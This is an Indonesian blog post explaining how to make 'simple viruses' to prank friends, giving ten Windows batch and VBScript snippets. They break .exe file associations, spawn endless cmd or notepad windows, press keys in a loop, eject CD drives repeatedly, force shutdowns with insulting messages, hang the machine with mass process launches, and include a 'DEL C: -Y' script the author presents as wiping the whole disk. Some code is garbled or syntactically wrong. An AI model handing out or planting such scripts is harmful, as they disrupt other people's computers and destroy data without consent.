Skip to main content

Cara Menciptakan Virus Sederhana

1. Saya akan menjelaskan cara menciptakan virus memakai CMD : Buka aktivitas cmd nya melalui klik start - run - ketik cmd atau sanggup melalui keyboard dengan mengetik key windows + R kemudian ketik cmd dan dan tekan enter kemudian ketikan script berikut di cmd "ASSOC.exe=.hank" tanpa tanda petik kemudian tekan enter! nah, ini menciptakan program/aplikasi yang berexstensi .exe tidak mau jalan, menyerupai game, dll. Tapi tenang, ini sanggup dikembalikan menyerupai semuala dengan cara buka cmd nya lagi kemudian ketik "ASSOC.exe=EXEFILE" trik ini sanggup untuk ngerjain teman sobat, ya cuma buat iseng-iseng.

2. Sekarang aku akan menjelaskan cara menciptakan virus memakai Notepad : Buka notepad nya melalui start - all programs - accessories - notepad kemudian ketik instruksi script berikut ke notepad :
------

start
start
start
start
start
start
start
start
start
start
start
start

------
Nah, selanjutnya simpan di notepad dengan nama apa saja dengan exstensi .bat pola : "eror.bat" tanpa tanda kutip dan Save As Type ganti menjadi All Files. Trik ini menciptakan komputer menjadi eror, alasannya yaitu akan membuka CMD yang banyak jikalau file "eror.bat" itu di buka.
3. Masih di notepad, kini aku akan jelaskan cara menciptakan notepad terbuka secara otomatis, silahkan ketik/ copas instruksi script berikut ke notepad :

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

Simpan di notepad dengan nama apa saja dengan exstensi .bat sama menyerupai yang tadi, pola "eror.bat" tanpa tanda kutip dan Save As Type ganti menjadi All Files. Trik ini akan menciptakan notepad terbuka dengan sendirinya secara otomatis.
4. Masih memakai notepad, yang kini cara menciptakan tombol backspace menjadi eror menekan terus menerus secara otomatis, eksklusif saja copas/ketik instruksi script berikut ke notepad :
MsgBox "kembali ke sajian sebelumnya"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop

Simpan instruksi script tersebut di notepad dengan nama apa saja yang penting tidak lupa menuliskan exstensi .vbs pola : "eror.vbs" tanpa tanda kutip dan Save As Type ganti menjadi Al Files. Trik ini menciptakan tombol backspace menjadi eror dan menekan dengan sendiri nya.
5. Masih memakai notepad, trik kini sanggup menciptakan CD/DVD Room buka tutup dengan sendiri nya, eksklusif aja copas/ketik instruksi script berikut ke notepad :
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

Simpan instruksi tersebut di notepad dengan nama bebas dan tambahkan exstensi .vbs pola : "eror.vbs" dan Save As Type ganti menjadi All Files, maka akan sanggup menciptakan CD/DVD Room buka tutup dengan sendirinya secara otomatis.
6. Trik kali ini sanggup menciptakan Caps Lock menyala terus menerus tak terkendali, eksklusif saja copas/ketik instruksi script berikut di notepad :
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop

Simpan instruksi script tersebut dengan nama bebas dan dengan exstensi .vbs pola "eror.vbs" dan Save As Type ganti menjadi All Files, maka jikalau File ini di buka akan menciptakan Caps Lock menyala terus menerus.
7. Trik yang ke tujuh, menciptakan komputer menjadi shoutdown dengan kata lain mati, eksklusif saja ini script nya copas ke notepad :
@echo off
msg * I don't like you
shutdown -c "Error! You are too ******!" -s

Simpan instruksi script tersebut dengan nama bebas dan dengan exstensi .vbs pola "eror.vbs" dan Save As Type ganti menjadi All Files, maka jikalau file ini di buka akan menciptakan komputer shoutdown atau mati.
8.Trik yang ini sama dengan trik yang nomor 7 hanya saja yang ini isi waktu, eksklusif saja copas/ketik instruksi script berikut ke notepad :
@echo shutdown -s -t 1 -f
Simpan instruksi script tersebut dengan nama bebas dan dengan exstensi .bat lain dengan trik yang no 7, pola : "eror.bat" tanpa tanda kutip dan Save As Type ganti menjadi All Files, Maka jikalau file ini dibuka akan sama dengan no 7 yaitu menciptakan komputer Shoutdown, hanya saja yang membedakan yaitu yang ini berisi waktu, lihat angka pada instruksi script tersebut yang berwarna biru, itu yaitu waktu yang diharapkan untuk mematikan komputer, sanggup di atur sesuai harapan (1 = 1 detik)
9. Kali ini trik yang tidak mengecewakan berbahaya, alasannya yaitu komputer akan dipenuhi oleh 100000000
tourstart yang akan memenuhi layar monitor dan akan menciptakan komputer menjadi hang,
untuk mengatasinya sanggup mendelete semua tourstart tersebut atau eksklusif merestart
komputer. Silahkan copas/ketik instruksi script berikut ke notepad :
option explicit
dim wshshell
set wshshell=wscript.createobject(“wscript.shell”)
dim x
for x = 1 to 100000000
wshshell.run “tourstart.exe”
next

Simpan dengan nama bebas dan dengan exstensi .vbs pola : "virus.vbs" tanpa tanda kutip dan Save As type ganti menjadi All Files. Pada angka yang aku beri wara biru, itu sanggup di ganti sesuai keinginan, sanggup dibentuk menjadi 100 atau 1000 saja, dan begitu file ini dibuka akan menciptakan tourstart sesuai dengan angka yang ditulis pada instruksi tesebut,
10. Nah Yang terakhir ini, aku rasa paling berbayaha, alasannya yaitu sanggup menghapus seluruh data di hardisk tanpa terkecuali, sehingga mau tidak mau ya harus instal ulang, eksklusif saja copas/ketik instruksi script berikut di notepad :
@echo off
DEL C: -Y
DEL D: -Y

Simpan dengan nama bebas dan exstensi .bat pola "virus.bat" tanpa tanda kutip dan Save As Type ganti menjadi All Files dan simpan , tapi JANGAN DIKLIK alasannya yaitu sanggup berakibat fatal bagi komputer anda.


contact me

facebook :
https://m.facebook.com/lutfi.hakim.5492216?ref=bookmarks

my youtube channel : freak channel
or link :
https://m.youtube.com/feed/account

whatsapp : +14502328724
Sumber https://lutfihakimaddres.blogspot.com/
Comment Policy: Silahkan tuliskan komentar Anda yang sesuai dengan topik postingan halaman ini. Komentar yang berisi tautan tidak akan ditampilkan sebelum disetujui.
Buka Komentar
Tutup Komentar